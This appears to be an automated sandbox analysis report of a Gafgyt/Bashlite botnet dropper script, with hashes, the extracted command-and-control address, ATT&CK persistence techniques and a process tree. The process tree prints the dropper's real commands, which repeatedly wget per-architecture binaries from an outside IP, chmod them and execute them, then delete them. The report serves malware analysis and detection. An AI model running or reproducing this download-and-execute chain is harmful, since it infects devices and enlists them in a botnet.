gafgyt | ac40e30ea6ab94b1102940d16c575f7c87dbe6335530e37f568c4ac2d967f53d

Analysis

max time kernel
148s
max time network
152s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
02-07-2024 05:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

qkdjdjj22.sh
Size

1KB
MD5

536b6c9024361ab349363a6a55c2a2b8
SHA1

d0aec54b19e3e9c9cd68dafe08c4cb6525d8435a
SHA256

ac40e30ea6ab94b1102940d16c575f7c87dbe6335530e37f568c4ac2d967f53d
SHA512

731b4d784a0b56464dba291fd0e43ee4f99cb2457c54cb91af21ee4c339aecc204c8a9dd592ba87017657752fdcbc6d4b6856f01dbbceefebcfc27affc673954

Score

10^/10

gafgyt botnet persistence

Malware Config

Extracted

Family

gafgyt

195.85.205.47:777

Signatures

Detected Gafgyt variant 2 IoCs

Processes:

resource yara_rule

/tmp/fileJho6MR family_gafgyt
/tmp/fileJho6MR family_gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

resource	yara_rule
/tmp/fileJho6MR	family_gafgyt
/tmp/fileJho6MR	family_gafgyt

Executes dropped EXE 44 IoCs

Processes:

fileJho6MRfilevTFhk3filemoTV0Hfilemf5puxfilezwRxwhfile8FktrWfileg8yT9Ofilef9VCKzfileAwhu1dfileokqn75fileVGk0HKfileqcFGivfile2jWCUifileBz8oDTfilenniY0HfileIwkh7mfileteLex4filenedGURfile6VXMexfilew50OykfileFmjhi3filewPck2Kfile6sOBaBfilefkDICifile3J2Nd9fileQGbeHLfilenoKEBqfileftbCGcfiley8hRDPfileGtV1PDfilethlCNgfileWYbBRUfilemSUsWJfileTDRillfile3uxPvbfileK2GtNRfilebjs9Pxfile19a5KpfilesATcHWfileYsSZ0FfilevINkRcfileHknWj4file49kSUKfilezzTlep

ioc	pid	process
/tmp/fileJho6MR	1515	fileJho6MR
/tmp/filevTFhk3	1516	filevTFhk3
/tmp/filemoTV0H	1517	filemoTV0H
/tmp/filemf5pux	1518	filemf5pux
/tmp/filezwRxwh	1519	filezwRxwh
/tmp/file8FktrW	1520	file8FktrW
/tmp/fileg8yT9O	1521	fileg8yT9O
/tmp/filef9VCKz	1522	filef9VCKz
/tmp/fileAwhu1d	1523	fileAwhu1d
/tmp/fileokqn75	1524	fileokqn75
/tmp/fileVGk0HK	1525	fileVGk0HK
/tmp/fileqcFGiv	1526	fileqcFGiv
/tmp/file2jWCUi	1527	file2jWCUi
/tmp/fileBz8oDT	1528	fileBz8oDT
/tmp/filenniY0H	1529	filenniY0H
/tmp/fileIwkh7m	1532	fileIwkh7m
/tmp/fileteLex4	1533	fileteLex4
/tmp/filenedGUR	1534	filenedGUR
/tmp/file6VXMex	1535	file6VXMex
/tmp/filew50Oyk	1536	filew50Oyk
/tmp/fileFmjhi3	1537	fileFmjhi3
/tmp/filewPck2K	1538	filewPck2K
/tmp/file6sOBaB	1539	file6sOBaB
/tmp/filefkDICi	1540	filefkDICi
/tmp/file3J2Nd9	1541	file3J2Nd9
/tmp/fileQGbeHL	1542	fileQGbeHL
/tmp/filenoKEBq	1543	filenoKEBq
/tmp/fileftbCGc	1544	fileftbCGc
/tmp/filey8hRDP	1545	filey8hRDP
/tmp/fileGtV1PD	1546	fileGtV1PD
/tmp/filethlCNg	1547	filethlCNg
/tmp/fileWYbBRU	1548	fileWYbBRU
/tmp/filemSUsWJ	1549	filemSUsWJ
/tmp/fileTDRill	1550	fileTDRill
/tmp/file3uxPvb	1551	file3uxPvb
/tmp/fileK2GtNR	1552	fileK2GtNR
/tmp/filebjs9Px	1553	filebjs9Px
/tmp/file19a5Kp	1554	file19a5Kp
/tmp/filesATcHW	1555	filesATcHW
/tmp/fileYsSZ0F	1556	fileYsSZ0F
/tmp/filevINkRc	1557	filevINkRc
/tmp/fileHknWj4	1558	fileHknWj4
/tmp/file49kSUK	1559	file49kSUK
/tmp/filezzTlep	1560	filezzTlep

Creates/modifies Cron job 1 TTPs 44 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

Processes:

filenniY0HfilesATcHWfileHknWj4file49kSUKqkdjdjj22.x86fileg8yT9OfileqcFGivfile2jWCUifilezwRxwhfilew50OykfilevINkRcfiley8hRDPfileTDRillfileK2GtNRfileWYbBRUfilef9VCKzfileVGk0HKfilenedGURfilenoKEBqfilethlCNgfilemSUsWJfileBz8oDTfileFmjhi3filefkDICifileftbCGcfileIwkh7mfile3J2Nd9fileQGbeHLfileAwhu1dfileokqn75fileteLex4file6VXMexfilevTFhk3filemoTV0Hfilemf5puxfile8FktrWfileGtV1PDfile3uxPvbfileYsSZ0Ffile19a5KpfileJho6MRfilewPck2Kfile6sOBaBfilebjs9Px

description	ioc	process
File opened for modification	/etc/cron.hourly/0	filenniY0H
File opened for modification	/etc/cron.hourly/0	filesATcHW
File opened for modification	/etc/cron.hourly/0	fileHknWj4
File opened for modification	/etc/cron.hourly/0	file49kSUK
File opened for modification	/etc/cron.hourly/0	qkdjdjj22.x86
File opened for modification	/etc/cron.hourly/0	fileg8yT9O
File opened for modification	/etc/cron.hourly/0	fileqcFGiv
File opened for modification	/etc/cron.hourly/0	file2jWCUi
File opened for modification	/etc/cron.hourly/0	filezwRxwh
File opened for modification	/etc/cron.hourly/0	filew50Oyk
File opened for modification	/etc/cron.hourly/0	filevINkRc
File opened for modification	/etc/cron.hourly/0	filey8hRDP
File opened for modification	/etc/cron.hourly/0	fileTDRill
File opened for modification	/etc/cron.hourly/0	fileK2GtNR
File opened for modification	/etc/cron.hourly/0	fileWYbBRU
File opened for modification	/etc/cron.hourly/0	filef9VCKz
File opened for modification	/etc/cron.hourly/0	fileVGk0HK
File opened for modification	/etc/cron.hourly/0	filenedGUR
File opened for modification	/etc/cron.hourly/0	filenoKEBq
File opened for modification	/etc/cron.hourly/0	filethlCNg
File opened for modification	/etc/cron.hourly/0	filemSUsWJ
File opened for modification	/etc/cron.hourly/0	fileBz8oDT
File opened for modification	/etc/cron.hourly/0	fileFmjhi3
File opened for modification	/etc/cron.hourly/0	filefkDICi
File opened for modification	/etc/cron.hourly/0	fileftbCGc
File opened for modification	/etc/cron.hourly/0	fileIwkh7m
File opened for modification	/etc/cron.hourly/0	file3J2Nd9
File opened for modification	/etc/cron.hourly/0	fileQGbeHL
File opened for modification	/etc/cron.hourly/0	fileAwhu1d
File opened for modification	/etc/cron.hourly/0	fileokqn75
File opened for modification	/etc/cron.hourly/0	fileteLex4
File opened for modification	/etc/cron.hourly/0	file6VXMex
File opened for modification	/etc/cron.hourly/0	filevTFhk3
File opened for modification	/etc/cron.hourly/0	filemoTV0H
File opened for modification	/etc/cron.hourly/0	filemf5pux
File opened for modification	/etc/cron.hourly/0	file8FktrW
File opened for modification	/etc/cron.hourly/0	fileGtV1PD
File opened for modification	/etc/cron.hourly/0	file3uxPvb
File opened for modification	/etc/cron.hourly/0	fileYsSZ0F
File opened for modification	/etc/cron.hourly/0	file19a5Kp
File opened for modification	/etc/cron.hourly/0	fileJho6MR
File opened for modification	/etc/cron.hourly/0	filewPck2K
File opened for modification	/etc/cron.hourly/0	file6sOBaB
File opened for modification	/etc/cron.hourly/0	filebjs9Px

Reads system routing table 1 TTPs 2 IoCs
Gets active network interfaces from /proc virtual filesystem.

System Network Configuration Discovery
T1016

Processes:

qkdjdjj22.x32qkdjdjj22.i586

description ioc process

File opened for reading /proc/net/route qkdjdjj22.x32
File opened for reading /proc/net/route qkdjdjj22.i586
Writes file to system bin folder 1 TTPs 1 IoCs

Hijack Execution Flow
T1574

Processes:

qkdjdjj22.x86

description ioc process

File opened for modification /bin/ls qkdjdjj22.x86
Reads system network configuration 1 TTPs 2 IoCs
Uses contents of /proc filesystem to enumerate network settings.

System Network Configuration Discovery
T1016

Processes:

qkdjdjj22.x32qkdjdjj22.i586

description ioc process

File opened for reading /proc/net/route qkdjdjj22.x32
File opened for reading /proc/net/route qkdjdjj22.i586

description	ioc	process
File opened for reading	/proc/net/route	qkdjdjj22.x32
File opened for reading	/proc/net/route	qkdjdjj22.i586

description	ioc	process
File opened for modification	/bin/ls	qkdjdjj22.x86

description	ioc	process
File opened for reading	/proc/net/route	qkdjdjj22.x32
File opened for reading	/proc/net/route	qkdjdjj22.i586

Reads runtime system information 45 IoCs

Reads data from /proc virtual filesystem.

Processes:

fileFmjhi3filethlCNgfilesATcHWfileHknWj4qkdjdjj22.x86fileJho6MRfileg8yT9Ofile6sOBaBfileQGbeHLfileGtV1PDfile19a5Kpfilemf5puxfileBz8oDTfileIwkh7mfilewPck2KfilefkDICifile3J2Nd9filey8hRDPfileYsSZ0FfilemoTV0HfilenniY0Hfile6VXMexfile49kSUKfile8FktrWfileWYbBRUfilebjs9Pxfilef9VCKzfile2jWCUifileVGk0HKfileqcFGivfilew50OykfilenoKEBqfilemSUsWJfilevTFhk3fileAwhu1dfileokqn75filezzTlepfile3uxPvbfileK2GtNRfilevINkRcfileteLex4filenedGURfileftbCGcfilezwRxwhfileTDRill

description	ioc	process
File opened for reading	/proc/self/exe	fileFmjhi3
File opened for reading	/proc/self/exe	filethlCNg
File opened for reading	/proc/self/exe	filesATcHW
File opened for reading	/proc/self/exe	fileHknWj4
File opened for reading	/proc/self/exe	qkdjdjj22.x86
File opened for reading	/proc/self/exe	fileJho6MR
File opened for reading	/proc/self/exe	fileg8yT9O
File opened for reading	/proc/self/exe	file6sOBaB
File opened for reading	/proc/self/exe	fileQGbeHL
File opened for reading	/proc/self/exe	fileGtV1PD
File opened for reading	/proc/self/exe	file19a5Kp
File opened for reading	/proc/self/exe	filemf5pux
File opened for reading	/proc/self/exe	fileBz8oDT
File opened for reading	/proc/self/exe	fileIwkh7m
File opened for reading	/proc/self/exe	filewPck2K
File opened for reading	/proc/self/exe	filefkDICi
File opened for reading	/proc/self/exe	file3J2Nd9
File opened for reading	/proc/self/exe	filey8hRDP
File opened for reading	/proc/self/exe	fileYsSZ0F
File opened for reading	/proc/self/exe	filemoTV0H
File opened for reading	/proc/self/exe	filenniY0H
File opened for reading	/proc/self/exe	file6VXMex
File opened for reading	/proc/self/exe	file49kSUK
File opened for reading	/proc/self/exe	file8FktrW
File opened for reading	/proc/self/exe	fileWYbBRU
File opened for reading	/proc/self/exe	filebjs9Px
File opened for reading	/proc/self/exe	filef9VCKz
File opened for reading	/proc/self/exe	file2jWCUi
File opened for reading	/proc/self/exe	fileVGk0HK
File opened for reading	/proc/self/exe	fileqcFGiv
File opened for reading	/proc/self/exe	filew50Oyk
File opened for reading	/proc/self/exe	filenoKEBq
File opened for reading	/proc/self/exe	filemSUsWJ
File opened for reading	/proc/self/exe	filevTFhk3
File opened for reading	/proc/self/exe	fileAwhu1d
File opened for reading	/proc/self/exe	fileokqn75
File opened for reading	/proc/self/exe	filezzTlep
File opened for reading	/proc/self/exe	file3uxPvb
File opened for reading	/proc/self/exe	fileK2GtNR
File opened for reading	/proc/self/exe	filevINkRc
File opened for reading	/proc/self/exe	fileteLex4
File opened for reading	/proc/self/exe	filenedGUR
File opened for reading	/proc/self/exe	fileftbCGc
File opened for reading	/proc/self/exe	filezwRxwh
File opened for reading	/proc/self/exe	fileTDRill

Writes file to tmp directory 56 IoCs

Malware often drops required files in the /tmp directory.

Processes:

fileTDRillfilebjs9Pxfile19a5KpfilevINkRcwgetfileokqn75filenniY0Hfile49kSUKfilemoTV0HfilezwRxwhwgetwgetfileJho6MRfile8FktrWfileVGk0HKfileQGbeHLfiley8hRDPwgetwgetwgetwgetfile6VXMexfilewPck2KfileYsSZ0FfilefkDICifile3uxPvbfileIwkh7mfileFmjhi3filenoKEBqfilevTFhk3filemf5puxfileWYbBRUwgetfileK2GtNRfilesATcHWfileteLex4filemSUsWJfileg8yT9Ofile3J2Nd9qkdjdjj22.x86wgetfileftbCGcfileGtV1PDfileHknWj4wgetwgetfileAwhu1dfile2jWCUifileBz8oDTfileqcFGivfilew50Oykfile6sOBaBfilethlCNgfilezzTlepfilef9VCKzfilenedGUR

description	ioc	process
File opened for modification	/tmp/file3uxPvb	fileTDRill
File opened for modification	/tmp/file19a5Kp	filebjs9Px
File opened for modification	/tmp/filesATcHW	file19a5Kp
File opened for modification	/tmp/fileHknWj4	filevINkRc
File opened for modification	/tmp/qkdjdjj22.x86	wget
File opened for modification	/tmp/fileVGk0HK	fileokqn75
File opened for modification	/tmp/fileIwkh7m	filenniY0H
File opened for modification	/tmp/filezzTlep	file49kSUK
File opened for modification	/tmp/filemf5pux	filemoTV0H
File opened for modification	/tmp/file8FktrW	filezwRxwh
File opened for modification	/tmp/qkdjdjj22.ppc	wget
File opened for modification	/tmp/qkdjdjj22.sh4	wget
File opened for modification	/tmp/filevTFhk3	fileJho6MR
File opened for modification	/tmp/fileg8yT9O	file8FktrW
File opened for modification	/tmp/fileqcFGiv	fileVGk0HK
File opened for modification	/tmp/filenoKEBq	fileQGbeHL
File opened for modification	/tmp/fileGtV1PD	filey8hRDP
File opened for modification	/tmp/qkdjdjj22.i586	wget
File opened for modification	/tmp/qkdjdjj22.arm4	wget
File opened for modification	/tmp/qkdjdjj22.mips	wget
File opened for modification	/tmp/qkdjdjj22.mpsl	wget
File opened for modification	/tmp/filew50Oyk	file6VXMex
File opened for modification	/tmp/file6sOBaB	filewPck2K
File opened for modification	/tmp/filevINkRc	fileYsSZ0F
File opened for modification	/tmp/file3J2Nd9	filefkDICi
File opened for modification	/tmp/fileK2GtNR	file3uxPvb
File opened for modification	/tmp/fileteLex4	fileIwkh7m
File opened for modification	/tmp/filewPck2K	fileFmjhi3
File opened for modification	/tmp/fileftbCGc	filenoKEBq
File opened for modification	/tmp/filemoTV0H	filevTFhk3
File opened for modification	/tmp/filezwRxwh	filemf5pux
File opened for modification	/tmp/filemSUsWJ	fileWYbBRU
File opened for modification	/tmp/qkdjdjj22.m68k	wget
File opened for modification	/tmp/filebjs9Px	fileK2GtNR
File opened for modification	/tmp/fileYsSZ0F	filesATcHW
File opened for modification	/tmp/filenedGUR	fileteLex4
File opened for modification	/tmp/fileTDRill	filemSUsWJ
File opened for modification	/tmp/filef9VCKz	fileg8yT9O
File opened for modification	/tmp/fileQGbeHL	file3J2Nd9
File opened for modification	/tmp/fileJho6MR	qkdjdjj22.x86
File opened for modification	/tmp/qkdjdjj22.arm6	wget
File opened for modification	/tmp/filey8hRDP	fileftbCGc
File opened for modification	/tmp/filethlCNg	fileGtV1PD
File opened for modification	/tmp/file49kSUK	fileHknWj4
File opened for modification	/tmp/qkdjdjj22.x32	wget
File opened for modification	/tmp/qkdjdjj22.ppc.1	wget
File opened for modification	/tmp/fileokqn75	fileAwhu1d
File opened for modification	/tmp/fileBz8oDT	file2jWCUi
File opened for modification	/tmp/filenniY0H	fileBz8oDT
File opened for modification	/tmp/file2jWCUi	fileqcFGiv
File opened for modification	/tmp/fileFmjhi3	filew50Oyk
File opened for modification	/tmp/filefkDICi	file6sOBaB
File opened for modification	/tmp/fileWYbBRU	filethlCNg
File opened for modification	/tmp/filefjW10d	filezzTlep
File opened for modification	/tmp/fileAwhu1d	filef9VCKz
File opened for modification	/tmp/file6VXMex	filenedGUR

/tmp/qkdjdjj22.sh
/tmp/qkdjdjj22.sh
1⤵
PID:1496

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.mips
2⤵
- Writes file to tmp directory
PID:1497

/bin/chmod
chmod 777 qkdjdjj22.mips
2⤵
PID:1501

/tmp/qkdjdjj22.mips
./qkdjdjj22.mips
2⤵
PID:1502

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.mpsl
2⤵
- Writes file to tmp directory
PID:1504

/bin/chmod
chmod 777 qkdjdjj22.mpsl
2⤵
PID:1505

/tmp/qkdjdjj22.mpsl
./qkdjdjj22.mpsl
2⤵
PID:1506

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.sh4
2⤵
- Writes file to tmp directory
PID:1508

/bin/chmod
chmod 777 qkdjdjj22.sh4
2⤵
PID:1509

/tmp/qkdjdjj22.sh4
./qkdjdjj22.sh4
2⤵
PID:1510

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.x86
2⤵
- Writes file to tmp directory
PID:1512

/bin/chmod
chmod 777 qkdjdjj22.x86
2⤵
PID:1513

/tmp/qkdjdjj22.x86
./qkdjdjj22.x86
2⤵
- Creates/modifies Cron job
- Writes file to system bin folder
- Reads runtime system information
- Writes file to tmp directory
PID:1514

/tmp/fileJho6MR
./qkdjdjj22.x86
3⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1515

/tmp/filevTFhk3
./qkdjdjj22.x86
4⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1516

/tmp/filemoTV0H
./qkdjdjj22.x86
5⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1517

/tmp/filemf5pux
./qkdjdjj22.x86
6⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1518

/tmp/filezwRxwh
./qkdjdjj22.x86
7⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1519

/tmp/file8FktrW
./qkdjdjj22.x86
8⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1520

/tmp/fileg8yT9O
./qkdjdjj22.x86
9⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1521

/tmp/filef9VCKz
./qkdjdjj22.x86
10⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1522

/tmp/fileAwhu1d
./qkdjdjj22.x86
11⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1523

/tmp/fileokqn75
./qkdjdjj22.x86
12⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1524

/tmp/fileVGk0HK
./qkdjdjj22.x86
13⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1525

/tmp/fileqcFGiv
./qkdjdjj22.x86
14⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1526

/tmp/file2jWCUi
./qkdjdjj22.x86
15⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1527

/tmp/fileBz8oDT
./qkdjdjj22.x86
16⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1528

/tmp/filenniY0H
./qkdjdjj22.x86
17⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1529

/tmp/fileIwkh7m
./qkdjdjj22.x86
18⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1532

/tmp/fileteLex4
./qkdjdjj22.x86
19⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1533

/tmp/filenedGUR
./qkdjdjj22.x86
20⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1534

/tmp/file6VXMex
./qkdjdjj22.x86
21⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1535

/tmp/filew50Oyk
./qkdjdjj22.x86
22⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1536

/tmp/fileFmjhi3
./qkdjdjj22.x86
23⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1537

/tmp/filewPck2K
./qkdjdjj22.x86
24⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1538

/tmp/file6sOBaB
./qkdjdjj22.x86
25⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1539

/tmp/filefkDICi
./qkdjdjj22.x86
26⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1540

/tmp/file3J2Nd9
./qkdjdjj22.x86
27⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1541

/tmp/fileQGbeHL
./qkdjdjj22.x86
28⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1542

/tmp/filenoKEBq
./qkdjdjj22.x86
29⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1543

/tmp/fileftbCGc
./qkdjdjj22.x86
30⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1544

/tmp/filey8hRDP
./qkdjdjj22.x86
31⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1545

/tmp/fileGtV1PD
./qkdjdjj22.x86
32⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1546

/tmp/filethlCNg
./qkdjdjj22.x86
33⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1547

/tmp/fileWYbBRU
./qkdjdjj22.x86
34⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1548

/tmp/filemSUsWJ
./qkdjdjj22.x86
35⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1549

/tmp/fileTDRill
./qkdjdjj22.x86
36⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1550

/tmp/file3uxPvb
./qkdjdjj22.x86
37⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1551

/tmp/fileK2GtNR
./qkdjdjj22.x86
38⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1552

/tmp/filebjs9Px
./qkdjdjj22.x86
39⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1553

/tmp/file19a5Kp
./qkdjdjj22.x86
40⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1554

/tmp/filesATcHW
./qkdjdjj22.x86
41⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1555

/tmp/fileYsSZ0F
./qkdjdjj22.x86
42⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1556

/tmp/filevINkRc
./qkdjdjj22.x86
43⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1557

/tmp/fileHknWj4
./qkdjdjj22.x86
44⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1558

/tmp/file49kSUK
./qkdjdjj22.x86
45⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1559

/tmp/filezzTlep
./qkdjdjj22.x86
46⤵
- Executes dropped EXE
- Reads runtime system information
- Writes file to tmp directory
PID:1560

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.arm6
2⤵
- Writes file to tmp directory
PID:1561

/bin/chmod
chmod 777 qkdjdjj22.arm6
2⤵
PID:1562

/tmp/qkdjdjj22.arm6
./qkdjdjj22.arm6
2⤵
PID:1563

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.x32
2⤵
- Writes file to tmp directory
PID:1565

/bin/chmod
chmod 777 qkdjdjj22.x32
2⤵
PID:1566

/tmp/qkdjdjj22.x32
./qkdjdjj22.x32
2⤵
- Reads system routing table
- Reads system network configuration
PID:1567

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.ppc
2⤵
- Writes file to tmp directory
PID:1570

/bin/chmod
chmod 777 qkdjdjj22.ppc
2⤵
PID:1571

/tmp/qkdjdjj22.ppc
./qkdjdjj22.ppc
2⤵
PID:1572

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.i586
2⤵
- Writes file to tmp directory
PID:1574

/bin/chmod
chmod 777 qkdjdjj22.i586
2⤵
PID:1575

/tmp/qkdjdjj22.i586
./qkdjdjj22.i586
2⤵
- Reads system routing table
- Reads system network configuration
PID:1576

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.m68k
2⤵
- Writes file to tmp directory
PID:1579

/bin/chmod
chmod 777 qkdjdjj22.m68k
2⤵
PID:1580

/tmp/qkdjdjj22.m68k
./qkdjdjj22.m68k
2⤵
PID:1581

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.ppc
2⤵
- Writes file to tmp directory
PID:1583

/bin/chmod
chmod 777 qkdjdjj22.ppc
2⤵
PID:1584

/tmp/qkdjdjj22.ppc
./qkdjdjj22.ppc
2⤵
PID:1585

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.arm4
2⤵
- Writes file to tmp directory
PID:1587

/bin/chmod
chmod 777 qkdjdjj22.arm4
2⤵
PID:1588

/tmp/qkdjdjj22.arm4
./qkdjdjj22.arm4
2⤵
PID:1589

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.arm5
2⤵
PID:1591

/bin/rm
rm -rf qkdjdjj22.arm4 qkdjdjj22.arm6 qkdjdjj22.i586 qkdjdjj22.m68k qkdjdjj22.mips qkdjdjj22.mpsl qkdjdjj22.ppc qkdjdjj22.ppc.1 qkdjdjj22.sh qkdjdjj22.sh4 qkdjdjj22.x32 qkdjdjj22.x86
2⤵
PID:1592

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/cron.hourly/0
Filesize
92B

MD5
3f006f7f81fc17be7f4a0d3da0fad5de

SHA1
97a94d3d0654c6551057af3809b52572bd7f9f5d

SHA256
982f9e0f089b91ba79df723435099df15c72e1201a45010ee60226ab136c93bf

SHA512
97d2ac0057427b940ada7c0fc805c1966e2535c3c3767ca85fef4a7e0fdc9d4ef9eb133530408b1e439df067881cb317e948ad9bfd487e958a04c97d9db978e0

Download Submit
/tmp/fileJho6MR
Filesize
155KB

MD5
d7c06cd80f877b3697b829ee12851d5d

SHA1
977a6258d47f140effe07e1b1d6a93ea161ad138

SHA256
4fedb406cadc190c90b552b01e5cb1891568db837cccd121fa9965223d21bc22

SHA512
19f524abef2e7ffd9908ef34459c6388780e30d69499315a1b70362441ab897af1158bd14c0133d3be8bb27381787c6062f55e8d99be06ee93736cbba535d295

Download Submit
/tmp/fileJho6MR
Filesize
163KB

MD5
6f344240f3686c40e24f9bb30af5bd93

SHA1
f3b470c47d9a74c91097836be07f7fc51fd977d6

SHA256
c1d8a7ed1e88ccc6ac4bd7002b2f9279031c82f45bf8e6f33aaa87602b1d8365

SHA512
187ac80956d59e6d5ef0d5b43a4c6c2faf94a4734e834f475421da103b4542571d6928bbbf3a8da0349578985bfefd3175fc908d8a1778f2b6311bb1fe7a1c39

Download Submit